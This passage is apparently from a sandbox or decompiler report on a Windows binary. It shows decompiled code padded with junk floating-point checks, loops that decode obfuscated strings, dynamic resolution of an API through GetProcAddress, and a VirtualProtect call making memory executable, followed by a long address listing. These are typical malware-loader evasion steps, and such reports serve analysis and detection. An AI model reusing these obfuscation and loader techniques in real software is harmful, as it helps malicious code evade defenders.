					_v108 =  *0x4108e8;
					_v108 =  *0x4108e4;
				}
				_v108 =  *0x4108e0;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v108 =  *0x4108dc;
					_v108 =  *0x4108d8;
				}
				_v108 =  *0x4108d4;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v108 =  *0x4108d0;
					_v108 =  *0x4108cc;
				}
				_v108 =  *0x4108c8;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v108 =  *0x4108c4;
					_v108 =  *0x4108c0;
				}
				_v108 =  *0x4108bc;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v108 =  *0x4108b8;
					_v108 =  *0x4108b4;
				}
				_v104 =  *0x4108b0;
				_v104 =  *0x4108ac;
				_v104 =  *0x4108a8;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v104 =  *0x4108a4;
					_v104 =  *0x4108a0;
				}
				_v104 =  *0x41089c;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v104 =  *0x410898;
					_v104 =  *0x410894;
				}
				_v104 =  *0x410890;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v104 =  *0x41088c;
					_v104 =  *0x410888;
				}
				_v104 =  *0x410884;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v104 =  *0x410880;
					_v104 =  *0x41087c;
				}
				_v104 =  *0x410878;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v104 =  *0x410874;
					_v104 =  *0x410870;
				}
				_v84 =  *0x41086c;
				_v84 =  *0x410868;
				_v84 =  *0x410864;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v84 =  *0x410860;
					_v84 =  *0x41085c;
				}
				_v84 =  *0x410858;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v84 =  *0x410854;
					_v84 =  *0x410850;
				}
				_v84 =  *0x41084c;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v84 =  *0x410848;
					_v84 =  *0x410844;
				}
				_v84 =  *0x410840;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v84 =  *0x41083c;
					_v84 =  *0x410838;
				}
				_v84 =  *0x410834;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v84 =  *0x410830;
					_v84 =  *0x41082c;
				}
				_v44 =  *0x410828;
				_v44 =  *0x410824;
				_v44 =  *0x410820;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v44 =  *0x41081c;
					_v44 =  *0x410818;
				}
				_v44 =  *0x410814;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v44 =  *0x410810;
					_v44 =  *0x41080c;
				}
				_v44 =  *0x410808;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v44 =  *0x410804;
					_v44 =  *0x410800;
				}
				_v44 =  *0x4107fc;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v44 =  *0x4107f8;
					_v44 =  *0x4107f4;
				}
				_v44 =  *0x4107f0;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v44 =  *0x4107ec;
					_v44 =  *0x4107e8;
				}
				_v56 =  *0x4107e4;
				_v56 =  *0x4107e0;
				_v56 =  *0x4107dc;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v56 =  *0x4107d8;
					_v56 =  *0x4107d4;
				}
				_v56 =  *0x4107d0;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v56 =  *0x4107cc;
					_v56 =  *0x4107c8;
				}
				_v56 =  *0x4107c4;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v56 =  *0x4107c0;
					_v56 =  *0x4107bc;
				}
				_v56 =  *0x4107b8;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v56 =  *0x4107b4;
					_v56 =  *0x4107b0;
				}
				_v56 =  *0x4107ac;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v56 =  *0x4107a8;
					_v56 =  *0x4107a4;
				}
				_v96 =  *0x4107a0;
				_v96 =  *0x41079c;
				_v96 =  *0x410798;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v96 =  *0x410794;
					_v96 =  *0x410790;
				}
				_v96 =  *0x41078c;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v96 =  *0x410788;
					_v96 =  *0x410784;
				}
				_v96 =  *0x410780;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v96 =  *0x41077c;
					_v96 =  *0x410778;
				}
				_v96 =  *0x410774;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v96 =  *0x410770;
					_v96 =  *0x41076c;
				}
				_v96 =  *0x410768;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v96 =  *0x410764;
					_v96 =  *0x410760;
				}
				_v36 =  *0x41075c;
				_v36 =  *0x410758;
				_v36 =  *0x410754;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v36 =  *0x410750;
					_v36 =  *0x41074c;
				}
				_v36 =  *0x410748;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v36 =  *0x410744;
					_v36 =  *0x410740;
				}
				_v36 =  *0x41073c;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v36 =  *0x410738;
					_v36 =  *0x410734;
				}
				_v36 =  *0x410730;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v36 =  *0x41072c;
					_v36 =  *0x410728;
				}
				_v36 =  *0x410724;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v36 =  *0x410720;
					_v36 =  *0x41071c;
				}
				_v72 = 4;
				_v71 = 0xac;
				_v70 = 0xcb;
				_v69 = 0x2c;
				_v68 = 0xcb;
				_v67 = 0x2f;
				_v66 = 0xcf;
				_v65 = 0xa4;
				_v64 = 0xc;
				_v63 = 0x31;
				_v62 = 0x4f;
				_v61 = 0x63;
				_v60 = 0x43;
				_v59 = 0x6e;
				_v58 = 0xcb;
				_v112 = 0;
				while(_v112 < 0xf) {
					_v113 =  *((intOrPtr*)(_t746 + _v112 - 0x44));
					_v113 = (_v113 & 0x000000ff) >> 0x00000005 | (_v113 & 0x000000ff) << 0x00000003;
					_v113 = (_v113 & 0x000000ff) - _v112;
					_v113 =  ~(_v113 & 0x000000ff);
					_v113 = (_v113 & 0x000000ff) + _v112;
					_v113 =  !(_v113 & 0x000000ff);
					_v113 = _v113 & 0x000000ff ^ 0x000000c0;
					_v113 = (_v113 & 0x000000ff) + _v112;
					_v113 = _v113 & 0x000000ff ^ _v112;
					_v113 =  ~(_v113 & 0x000000ff);
					_v113 = (_v113 & 0x000000ff) + _v112;
					_v113 = _v113 & 0x000000ff ^ 0x000000f8;
					_v113 =  !(_v113 & 0x000000ff);
					_v113 = _v113 & 0x000000ff ^ 0x000000d4;
					_v113 = (_v113 & 0x000000ff) >> 0x00000001 | (_v113 & 0x000000ff) << 0x00000007;
					_v113 = _v113 & 0x000000ff ^ 0x0000002f;
					 *((char*)(_t746 + _v112 - 0x44)) = _v113;
					_t648 = _v112 + 1;
					_v112 = _t648;
				}
				_v52 =  *0x410718;
				_v52 =  *0x410714;
				_v52 =  *0x410710;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v52 =  *0x41070c;
					_v52 =  *0x410708;
				}
				_v52 =  *0x410704;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v52 =  *0x410700;
					_v52 =  *0x4106fc;
				}
				_v52 =  *0x4106f8;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v52 =  *0x4106f4;
					_v52 =  *0x4106f0;
				}
				_v52 =  *0x4106ec;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v52 =  *0x4106e8;
					_v52 =  *0x4106e4;
				}
				_v52 =  *0x4106e0;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v52 =  *0x4106dc;
					_v52 =  *0x4106d8;
				}
				_v48 =  *0x4106d4;
				_v48 =  *0x4106d0;
				_v48 =  *0x4106cc;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v48 =  *0x4106c8;
					_v48 =  *0x4106c4;
				}
				_v48 =  *0x4106c0;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v48 =  *0x4106bc;
					_v48 =  *0x4106b8;
				}
				_v48 =  *0x4106b4;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v48 =  *0x4106b0;
					_v48 =  *0x4106ac;
				}
				_v48 =  *0x4106a8;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v48 =  *0x4106a4;
					_v48 =  *0x4106a0;
				}
				_v48 =  *0x41069c;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v48 =  *0x410698;
					_v48 =  *0x410694;
				}
				_v12 =  *0x410690;
				_v12 =  *0x41068c;
				_v12 =  *0x410688;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v12 =  *0x410684;
					_v12 =  *0x410680;
				}
				_v12 =  *0x41067c;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v12 =  *0x410678;
					_v12 =  *0x410674;
				}
				_v12 =  *0x410670;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v12 =  *0x41066c;
					_v12 =  *0x410668;
				}
				_v12 =  *0x410664;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v12 =  *0x410660;
					_v12 =  *0x41065c;
				}
				_v12 =  *0x410658;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v12 =  *0x410654;
					_v12 =  *0x410650;
				}
				_v8 =  *0x41064c;
				_v8 =  *0x410648;
				_v8 =  *0x410644;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v8 =  *0x410640;
					_v8 =  *0x41063c;
				}
				_v8 =  *0x410638;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v8 =  *0x410634;
					_v8 =  *0x410630;
				}
				_v8 =  *0x41062c;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v8 =  *0x410628;
					_v8 =  *0x410624;
				}
				_v8 =  *0x410620;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v8 =  *0x41061c;
					_v8 =  *0x410618;
				}
				_v8 =  *0x410614;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v8 =  *0x410610;
					_v8 =  *0x41060c;
				}
				_v92 =  *0x410608;
				_v92 =  *0x410604;
				_v92 =  *0x410600;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v92 =  *0x4105fc;
					_v92 =  *0x4105f8;
				}
				_v92 =  *0x4105f4;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v92 =  *0x4105f0;
					_v92 =  *0x4105ec;
				}
				_v92 =  *0x4105e8;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v92 =  *0x4105e4;
					_v92 =  *0x4105e0;
				}
				_v92 =  *0x4105dc;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v92 =  *0x4105d8;
					_v92 =  *0x4105d4;
				}
				_v92 =  *0x4105d0;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v92 =  *0x4105cc;
					_v92 =  *0x4105c8;
				}
				_v100 =  *0x4105c4;
				_v100 =  *0x4105c0;
				_v100 =  *0x4105bc;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v100 =  *0x4105b8;
					_v100 =  *0x4105b4;
				}
				_v100 =  *0x4105b0;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v100 =  *0x4105ac;
					_v100 =  *0x4105a8;
				}
				_v100 =  *0x4105a4;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v100 =  *0x4105a0;
					_v100 =  *0x41059c;
				}
				_v100 =  *0x410598;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v100 =  *0x410594;
					_v100 =  *0x410590;
				}
				_v100 =  *0x41058c;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v100 =  *0x410588;
					_v100 =  *0x410584;
				}
				_v88 =  *0x410580;
				_v88 =  *0x41057c;
				_v88 =  *0x410578;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v88 =  *0x410574;
					_v88 =  *0x410570;
				}
				_v88 =  *0x41056c;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v88 =  *0x410568;
					_v88 =  *0x410564;
				}
				_v88 =  *0x410560;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v88 =  *0x41055c;
					_v88 =  *0x410558;
				}
				_v88 =  *0x410554;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v88 =  *0x410550;
					_v88 =  *0x41054c;
				}
				_v88 =  *0x410548;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v88 =  *0x410544;
					_v88 =  *0x410540;
				}
				_v32 =  *0x41053c;
				_v32 =  *0x410538;
				_v32 =  *0x410534;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v32 =  *0x410530;
					_v32 =  *0x41052c;
				}
				_v32 =  *0x410528;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v32 =  *0x410524;
					_v32 =  *0x410520;
				}
				_v32 =  *0x41051c;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v32 =  *0x410518;
					_v32 =  *0x410514;
				}
				_v32 =  *0x410510;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v32 =  *0x41050c;
					_v32 =  *0x410508;
				}
				_v32 =  *0x410504;
				asm("fcomp qword [0x4104e8]");
				asm("fnstsw ax");
				if((_t648 & 0x00000044) == 0) {
					_v32 =  *0x410500;
					_v32 =  *0x4104fc;
				}
				_v28 = 0x53;
				_v27 = 0xa9;
				_v26 = 0xbb;
				_v25 = 0x45;
				_v24 = 0x74;
				_v23 = 0x8c;
				_v22 = 0xaf;
				_v21 = 0x77;
				_v20 = 0x36;
				_v19 = 0xbb;
				_v18 = 0xe4;
				_v17 = 0x1f;
				_v16 = 0xfb;
				_v120 = 0;
				while(_v120 < 0xd) {
					_v121 =  *((intOrPtr*)(_t746 + _v120 - 0x18));
					_v121 = (_v121 & 0x000000ff) - _v120;
					_v121 = (_v121 & 0x000000ff) >> 0x00000006 | (_v121 & 0x000000ff) << 0x00000002;
					_v121 = (_v121 & 0x000000ff) + 0xee;
					_v121 =  ~(_v121 & 0x000000ff);
					_v121 = _v121 & 0x000000ff ^ _v120;
					_v121 =  ~(_v121 & 0x000000ff);
					_v121 = (_v121 & 0x000000ff) >> 0x00000002 | (_v121 & 0x000000ff) << 0x00000006;
					_v121 =  !(_v121 & 0x000000ff);
					_v121 = (_v121 & 0x000000ff) + 0x45;
					_v121 = _v121 & 0x000000ff ^ _v120;
					_v121 = (_v121 & 0x000000ff) - _v120;
					_v121 = _v121 & 0x000000ff ^ _v120;
					_v121 = (_v121 & 0x000000ff) + 0x15;
					_v121 = (_v121 & 0x000000ff) >> 0x00000002 | (_v121 & 0x000000ff) << 0x00000006;
					_v121 = (_v121 & 0x000000ff) + 0x89;
					 *((char*)(_t746 + _v120 - 0x18)) = _v121;
					_v120 = _v120 + 1;
				}
				_v76 = GetModuleHandleA( &_v28);
				_v40 = 0;
				 *0x437b94 = GetProcAddress(_v76,  &_v72);
				VirtualProtect(_a4, _a8, 0x40,  &_v40); // executed
				return 0;
			}























































                                                                                                                                                                                            0x004018a0
                                                                                                                                                                                            0x004018ac
                                                                                                                                                                                            0x004018b5
                                                                                                                                                                                            0x004018be
                                                                                                                                                                                            0x004018c4
                                                                                                                                                                                            0x004018ca
                                                                                                                                                                                            0x004018cf
                                                                                                                                                                                            0x004018d7
                                                                                                                                                                                            0x004018e0
                                                                                                                                                                                            0x004018e0
                                                                                                                                                                                            0x004018e9
                                                                                                                                                                                            0x004018ef
                                                                                                                                                                                            0x004018f5
                                                                                                                                                                                            0x004018fa
                                                                                                                                                                                            0x00401902
                                                                                                                                                                                            0x0040190b
                                                                                                                                                                                            0x0040190b
                                                                                                                                                                                            0x00401914
                                                                                                                                                                                            0x0040191a
                                                                                                                                                                                            0x00401920
                                                                                                                                                                                            0x00401925
                                                                                                                                                                                            0x0040192d
                                                                                                                                                                                            0x00401936
                                                                                                                                                                                            0x00401936
                                                                                                                                                                                            0x0040193f
                                                                                                                                                                                            0x00401945
                                                                                                                                                                                            0x0040194b
                                                                                                                                                                                            0x00401950
                                                                                                                                                                                            0x00401958
                                                                                                                                                                                            0x00401961
                                                                                                                                                                                            0x00401961
                                                                                                                                                                                            0x0040196a
                                                                                                                                                                                            0x00401970
                                                                                                                                                                                            0x00401976
                                                                                                                                                                                            0x0040197b
                                                                                                                                                                                            0x00401983
                                                                                                                                                                                            0x0040198c
                                                                                                                                                                                            0x0040198c
                                                                                                                                                                                            0x00401995
                                                                                                                                                                                            0x0040199e
                                                                                                                                                                                            0x004019a7
                                                                                                                                                                                            0x004019ad
                                                                                                                                                                                            0x004019b3
                                                                                                                                                                                            0x004019b8
                                                                                                                                                                                            0x004019c0
                                                                                                                                                                                            0x004019c9
                                                                                                                                                                                            0x004019c9
                                                                                                                                                                                            0x004019d2
                                                                                                                                                                                            0x004019d8
                                                                                                                                                                                            0x004019de
                                                                                                                                                                                            0x004019e3
                                                                                                                                                                                            0x004019eb
                                                                                                                                                                                            0x004019f4
                                                                                                                                                                                            0x004019f4
                                                                                                                                                                                            0x004019fd
                                                                                                                                                                                            0x00401a03
                                                                                                                                                                                            0x00401a09
                                                                                                                                                                                            0x00401a0e
                                                                                                                                                                                            0x00401a16
                                                                                                                                                                                            0x00401a1f
                                                                                                                                                                                            0x00401a1f
                                                                                                                                                                                            0x00401a28
                                                                                                                                                                                            0x00401a2e
                                                                                                                                                                                            0x00401a34
                                                                                                                                                                                            0x00401a39
                                                                                                                                                                                            0x00401a41
                                                                                                                                                                                            0x00401a4a
                                                                                                                                                                                            0x00401a4a
                                                                                                                                                                                            0x00401a53
                                                                                                                                                                                            0x00401a59
                                                                                                                                                                                            0x00401a5f
                                                                                                                                                                                            0x00401a64
                                                                                                                                                                                            0x00401a6c
                                                                                                                                                                                            0x00401a75
                                                                                                                                                                                            0x00401a75
                                                                                                                                                                                            0x00401a7e
                                                                                                                                                                                            0x00401a87
                                                                                                                                                                                            0x00401a90
                                                                                                                                                                                            0x00401a96
                                                                                                                                                                                            0x00401a9c
                                                                                                                                                                                            0x00401aa1
                                                                                                                                                                                            0x00401aa9
                                                                                                                                                                                            0x00401ab2
                                                                                                                                                                                            0x00401ab2
                                                                                                                                                                                            0x00401abb
                                                                                                                                                                                            0x00401ac1
                                                                                                                                                                                            0x00401ac7
                                                                                                                                                                                            0x00401acc
                                                                                                                                                                                            0x00401ad4
                                                                                                                                                                                            0x00401add
                                                                                                                                                                                            0x00401add
                                                                                                                                                                                            0x00401ae6
                                                                                                                                                                                            0x00401aec
                                                                                                                                                                                            0x00401af2
                                                                                                                                                                                            0x00401af7
                                                                                                                                                                                            0x00401aff
                                                                                                                                                                                            0x00401b08
                                                                                                                                                                                            0x00401b08
                                                                                                                                                                                            0x00401b11
                                                                                                                                                                                            0x00401b17
                                                                                                                                                                                            0x00401b1d
                                                                                                                                                                                            0x00401b22
                                                                                                                                                                                            0x00401b2a
                                                                                                                                                                                            0x00401b33
                                                                                                                                                                                            0x00401b33
                                                                                                                                                                                            0x00401b3c
                                                                                                                                                                                            0x00401b42
                                                                                                                                                                                            0x00401b48
                                                                                                                                                                                            0x00401b4d
                                                                                                                                                                                            0x00401b55
                                                                                                                                                                                            0x00401b5e
                                                                                                                                                                                            0x00401b5e
                                                                                                                                                                                            0x00401b67
                                                                                                                                                                                            0x00401b70
                                                                                                                                                                                            0x00401b79
                                                                                                                                                                                            0x00401b7f
                                                                                                                                                                                            0x00401b85
                                                                                                                                                                                            0x00401b8a
                                                                                                                                                                                            0x00401b92
                                                                                                                                                                                            0x00401b9b
                                                                                                                                                                                            0x00401b9b
                                                                                                                                                                                            0x00401ba4
                                                                                                                                                                                            0x00401baa
                                                                                                                                                                                            0x00401bb0
                                                                                                                                                                                            0x00401bb5
                                                                                                                                                                                            0x00401bbd
                                                                                                                                                                                            0x00401bc6
                                                                                                                                                                                            0x00401bc6
                                                                                                                                                                                            0x00401bcf
                                                                                                                                                                                            0x00401bd5
                                                                                                                                                                                            0x00401bdb
                                                                                                                                                                                            0x00401be0
                                                                                                                                                                                            0x00401be8
                                                                                                                                                                                            0x00401bf1
                                                                                                                                                                                            0x00401bf1
                                                                                                                                                                                            0x00401bfa
                                                                                                                                                                                            0x00401c00
                                                                                                                                                                                            0x00401c06
                                                                                                                                                                                            0x00401c0b
                                                                                                                                                                                            0x00401c13
                                                                                                                                                                                            0x00401c1c
                                                                                                                                                                                            0x00401c1c
                                                                                                                                                                                            0x00401c25
                                                                                                                                                                                            0x00401c2b
                                                                                                                                                                                            0x00401c31
                                                                                                                                                                                            0x00401c36
                                                                                                                                                                                            0x00401c3e
                                                                                                                                                                                            0x00401c47
                                                                                                                                                                                            0x00401c47
                                                                                                                                                                                            0x00401c50
                                                                                                                                                                                            0x00401c59
                                                                                                                                                                                            0x00401c62
                                                                                                                                                                                            0x00401c68
                                                                                                                                                                                            0x00401c6e
                                                                                                                                                                                            0x00401c73
                                                                                                                                                                                            0x00401c7b
                                                                                                                                                                                            0x00401c84
                                                                                                                                                                                            0x00401c84
                                                                                                                                                                                            0x00401c8d
                                                                                                                                                                                            0x00401c93
                                                                                                                                                                                            0x00401c99
                                                                                                                                                                                            0x00401c9e
                                                                                                                                                                                            0x00401ca6
                                                                                                                                                                                            0x00401caf
                                                                                                                                                                                            0x00401caf
                                                                                                                                                                                            0x00401cb8
                                                                                                                                                                                            0x00401cbe
                                                                                                                                                                                            0x00401cc4
                                                                                                                                                                                            0x00401cc9
                                                                                                                                                                                            0x00401cd1
                                                                                                                                                                                            0x00401cda
                                                                                                                                                                                            0x00401cda
                                                                                                                                                                                            0x00401ce3
                                                                                                                                                                                            0x00401ce9
                                                                                                                                                                                            0x00401cef
                                                                                                                                                                                            0x00401cf4
                                                                                                                                                                                            0x00401cfc
                                                                                                                                                                                            0x00401d05
                                                                                                                                                                                            0x00401d05
                                                                                                                                                                                            0x00401d0e
                                                                                                                                                                                            0x00401d14
                                                                                                                                                                                            0x00401d1a
                                                                                                                                                                                            0x00401d1f
                                                                                                                                                                                            0x00401d27
                                                                                                                                                                                            0x00401d30
                                                                                                                                                                                            0x00401d30
                                                                                                                                                                                            0x00401d39
                                                                                                                                                                                            0x00401d42
                                                                                                                                                                                            0x00401d4b
                                                                                                                                                                                            0x00401d51
                                                                                                                                                                                            0x00401d57
                                                                                                                                                                                            0x00401d5c
                                                                                                                                                                                            0x00401d64
                                                                                                                                                                                            0x00401d6d
                                                                                                                                                                                            0x00401d6d
                                                                                                                                                                                            0x00401d76
                                                                                                                                                                                            0x00401d7c
                                                                                                                                                                                            0x00401d82
                                                                                                                                                                                            0x00401d87
                                                                                                                                                                                            0x00401d8f
                                                                                                                                                                                            0x00401d98
                                                                                                                                                                                            0x00401d98
                                                                                                                                                                                            0x00401da1
                                                                                                                                                                                            0x00401da7
                                                                                                                                                                                            0x00401dad
                                                                                                                                                                                            0x00401db2
                                                                                                                                                                                            0x00401dba
                                                                                                                                                                                            0x00401dc3
                                                                                                                                                                                            0x00401dc3
                                                                                                                                                                                            0x00401dcc
                                                                                                                                                                                            0x00401dd2
                                                                                                                                                                                            0x00401dd8
                                                                                                                                                                                            0x00401ddd
                                                                                                                                                                                            0x00401de5
                                                                                                                                                                                            0x00401dee
                                                                                                                                                                                            0x00401dee
                                                                                                                                                                                            0x00401df7
                                                                                                                                                                                            0x00401dfd
                                                                                                                                                                                            0x00401e03
                                                                                                                                                                                            0x00401e08
                                                                                                                                                                                            0x00401e10
                                                                                                                                                                                            0x00401e19
                                                                                                                                                                                            0x00401e19
                                                                                                                                                                                            0x00401e22
                                                                                                                                                                                            0x00401e2b
                                                                                                                                                                                            0x00401e34
                                                                                                                                                                                            0x00401e3a
                                                                                                                                                                                            0x00401e40
                                                                                                                                                                                            0x00401e45
                                                                                                                                                                                            0x00401e4d
                                                                                                                                                                                            0x00401e56
                                                                                                                                                                                            0x00401e56
                                                                                                                                                                                            0x00401e5f
                                                                                                                                                                                            0x00401e65
                                                                                                                                                                                            0x00401e6b
                                                                                                                                                                                            0x00401e70
                                                                                                                                                                                            0x00401e78
                                                                                                                                                                                            0x00401e81
                                                                                                                                                                                            0x00401e81
                                                                                                                                                                                            0x00401e8a
                                                                                                                                                                                            0x00401e90
                                                                                                                                                                                            0x00401e96
                                                                                                                                                                                            0x00401e9b
                                                                                                                                                                                            0x00401ea3
                                                                                                                                                                                            0x00401eac
                                                                                                                                                                                            0x00401eac
                                                                                                                                                                                            0x00401eb5
                                                                                                                                                                                            0x00401ebb
                                                                                                                                                                                            0x00401ec1
                                                                                                                                                                                            0x00401ec6
                                                                                                                                                                                            0x00401ece
                                                                                                                                                                                            0x00401ed7
                                                                                                                                                                                            0x00401ed7
                                                                                                                                                                                            0x00401ee0
                                                                                                                                                                                            0x00401ee6
                                                                                                                                                                                            0x00401eec
                                                                                                                                                                                            0x00401ef1
                                                                                                                                                                                            0x00401ef9
                                                                                                                                                                                            0x00401f02
                                                                                                                                                                                            0x00401f02
                                                                                                                                                                                            0x00401f0b
                                                                                                                                                                                            0x00401f14
                                                                                                                                                                                            0x00401f1d
                                                                                                                                                                                            0x00401f23
                                                                                                                                                                                            0x00401f29
                                                                                                                                                                                            0x00401f2e
                                                                                                                                                                                            0x00401f36
                                                                                                                                                                                            0x00401f3f
                                                                                                                                                                                            0x00401f3f
                                                                                                                                                                                            0x00401f48
                                                                                                                                                                                            0x00401f4e
                                                                                                                                                                                            0x00401f54
                                                                                                                                                                                            0x00401f59
                                                                                                                                                                                            0x00401f61
                                                                                                                                                                                            0x00401f6a
                                                                                                                                                                                            0x00401f6a
                                                                                                                                                                                            0x00401f73
                                                                                                                                                                                            0x00401f79
                                                                                                                                                                                            0x00401f7f
                                                                                                                                                                                            0x00401f84
                                                                                                                                                                                            0x00401f8c
